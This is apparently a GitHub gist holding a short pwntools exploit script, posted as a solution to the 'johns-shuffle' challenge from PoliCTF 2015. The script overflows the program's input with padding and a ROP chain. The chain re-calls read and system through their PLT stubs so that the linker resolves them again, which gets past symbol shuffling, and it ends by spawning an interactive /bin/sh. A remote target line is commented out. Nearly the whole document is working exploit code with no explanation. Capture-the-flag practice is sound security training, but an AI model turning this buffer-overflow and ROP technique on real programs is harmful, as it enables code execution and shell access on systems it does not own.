Skip to content

Instantly share code, notes, and snippets.

@kokjo
Created July 14, 2015 09:06
Show Gist options
  • Save kokjo/06ef3424ce19815240e3 to your computer and use it in GitHub Desktop.
Save kokjo/06ef3424ce19815240e3 to your computer and use it in GitHub Desktop.
Solution for johns-shufle from polictf 2015
from pwn import *
e = ELF("./johns-shuffle")
rop = ROP(e)
command = "/bin/sh"
# Bypass the shuffling by forcing the dynamic linker to lookup the symbols again
rop.call(e.plt["read"]+6, [0, e.bss(), len(command)+1])
rop.call(e.plt["system"]+6, [e.bss()])
r = process("./johns-shuffle")
#r = remote('shuffle.polictf.it',80)
r.sendlineafter("mistake..\n", "exit"+ "A"*28 + str(rop))
r.sendafter("\n", command+"\x00")
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment